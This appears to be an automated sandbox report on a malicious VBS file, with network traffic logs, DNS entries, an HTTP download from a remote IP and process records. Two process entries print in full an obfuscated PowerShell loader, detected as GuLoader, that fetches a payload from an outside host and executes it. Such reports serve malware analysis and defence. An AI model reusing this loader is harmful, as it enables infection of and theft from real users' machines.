                                    Apr 15, 2025 17:35:15.458921909 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.458921909 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.459136009 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.459136009 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587003946 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587033987 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587053061 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587066889 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587080956 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587095022 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587109089 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587124109 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587137938 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587151051 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587166071 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587171078 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587171078 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587181091 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587198019 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587203979 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587203979 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587223053 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587239027 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587253094 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587266922 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587269068 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587269068 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587281942 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587296963 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587311029 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587321043 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587321043 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587327003 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587341070 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587354898 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587372065 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587388039 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587388039 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587388039 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587402105 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587412119 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587419987 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587435961 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587450981 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587466002 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.587477922 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.587477922 CEST4971880192.168.2.468.168.223.108
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 15, 2025 17:35:10.108688116 CEST | 1.1.1.1 | 192.168.2.4 | 0x6430 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 15, 2025 17:35:10.108688116 CEST | 1.1.1.1 | 192.168.2.4 | 0x6430 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                    • 68.168.223.108
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49718 | 68.168.223.108 | 80 | 8104 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Apr 15, 2025 17:35:14.793342113 CEST | 174 | OUT | GET /JD/Gossipers.toc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: 68.168.223.108
Connection: Keep-Alive
Apr 15, 2025 17:35:14.936954975 CEST | 1358 | IN | HTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Wed, 26 Mar 2025 22:35:44 GMT
                                    Accept-Ranges: bytes
                                    ETag: "53ac96699f9edb1:0"
                                    Server: Microsoft-IIS/10.0
                                    Date: Tue, 15 Apr 2025 15:35:14 GMT
                                    Content-Length: 575624


                                    Target ID:0
                                    Start time:11:35:08
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"
                                    Imagebase:0x7ff61fb00000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:11:35:11
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. 
rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe 
DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;"
                                    Imagebase:0x7ff7016f0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:11:35:11
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff62fc20000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:11:35:19
                                    Start date:15/04/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. 
rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe 
DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;"
                                    Imagebase:0xbe0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:11:35:19
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff62fc20000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    No disassembly